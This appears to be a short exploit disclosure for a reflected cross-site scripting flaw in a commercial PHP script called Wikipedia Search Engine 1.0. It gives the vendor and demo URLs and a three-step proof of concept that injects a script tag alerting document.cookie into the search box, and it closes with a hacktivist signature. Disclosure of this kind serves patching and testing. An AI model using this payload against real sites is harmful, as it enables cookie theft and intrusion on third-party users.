Wikipedia Search Engine 1.0 Cross Site Scripting Vulnerability

Wikipedia Search Engine version 1.0 suffers from a cross site scripting vulnerability.
# Exploit Title: Wikipedia Search Engine PHP – xss
# Google Dork: N/A
# Date: 2017/31/12
# Exploit Author: ShanoWeb
# Author Mail : Mr[dot]Net2Net[at]Gmail[dot]com
# Vendor Homepage: https://www.codester.com/niagawebster
# Software Buy: https://www.codester.com/items/5328/wikipedia-search-engine-php
# Demo: http://wikipedia.niagawebster.com/index.php
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# Exploit :

Hi 2 All
1. go to  index page:
2. insert to textbox "Search and Download On Wiki"  -> <script>alert(document.cookie);</script> or <script>alert(/ShanoWeb/);</script>
3. click to search now ...
:D
./
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
| Find and patch bug in your website and system|
| Contact    : Mr[dot]Net2Net[at]Gmail[dot]com |
|=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|
|=============================================================|
/-------------------------------------------------------------\
|                         My Message To                       |
\-------------------------------------------------------------/
|= [!] Make Love,Not  War!. Peace No War!
|= [!] We Are One!
|= [!] We are Legion,We do not Forgive,We Do not Forge
|= [!] We Love All Children from Palestine
|=============================================================|

Leave a Reply